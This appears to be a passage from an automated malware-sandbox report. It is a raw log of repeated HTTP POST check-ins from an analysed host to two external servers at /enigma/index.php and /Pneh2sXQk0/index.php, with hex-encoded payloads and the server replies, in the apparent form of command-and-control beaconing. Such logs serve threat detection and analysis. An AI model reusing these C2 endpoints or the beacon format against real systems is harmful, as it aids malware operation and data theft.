                                                                                                                                                                                                                                      1391192.168.2.551246193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.949048042 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.200265884 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1392192.168.2.551247193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.170573950 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.420720100 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1393192.168.2.551248193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.456633091 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.711802006 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1394192.168.2.551249193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.675677061 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:22.929649115 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1395192.168.2.551250193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.057893038 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.306097031 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1396192.168.2.551251193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.262765884 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.512794018 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1397192.168.2.551252193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.554732084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.803133011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1398192.168.2.551253193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:23.771411896 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.027760983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1399192.168.2.551254193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.149641037 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.397629023 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1400192.168.2.551255193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.362396955 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.605443001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1401192.168.2.551256193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.653465033 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.910254955 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1402192.168.2.551257193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:24.856856108 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.106906891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1403192.168.2.551258193.233.132.167802956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.243098021 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.488406897 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1404192.168.2.551259193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.448409081 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.697608948 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1405192.168.2.551260193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.743052006 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.996663094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1406192.168.2.551261193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:25.946080923 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.195178986 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1407192.168.2.551262193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.340588093 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.592338085 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1408192.168.2.551263193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.522227049 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.771167994 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
